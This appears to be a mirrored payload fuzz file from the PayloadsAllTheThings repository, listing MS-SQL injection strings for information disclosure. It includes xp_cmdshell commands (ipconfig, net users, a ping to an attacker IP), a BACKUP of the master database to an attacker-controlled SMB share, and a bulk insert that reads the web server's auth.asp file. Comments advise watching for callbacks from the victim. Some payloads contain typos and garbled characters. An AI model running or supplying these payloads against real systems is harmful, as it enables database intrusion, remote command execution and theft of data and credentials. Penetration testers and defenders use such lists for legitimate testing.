mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-30 00:05:26 +00:00
16 lines
716 B
Plaintext
16 lines
716 B
Plaintext
# ms-sqli info disclosure payload fuzzfile
|
|
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
|
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
|
# might need to terminate payloads with ;--
|
|
select @@version
|
|
select @@servernamee
|
|
select @@microsoftversione
|
|
select * from master..sysserverse
|
|
select * from sysusers
|
|
exec master..xp_cmdshell 'ipconfig+/all'
|
|
exec master..xp_cmdshell 'net+view'
|
|
exec master..xp_cmdshell 'net+users'
|
|
exec master..xp_cmdshell 'ping+<attackerip>'
|
|
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
|
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|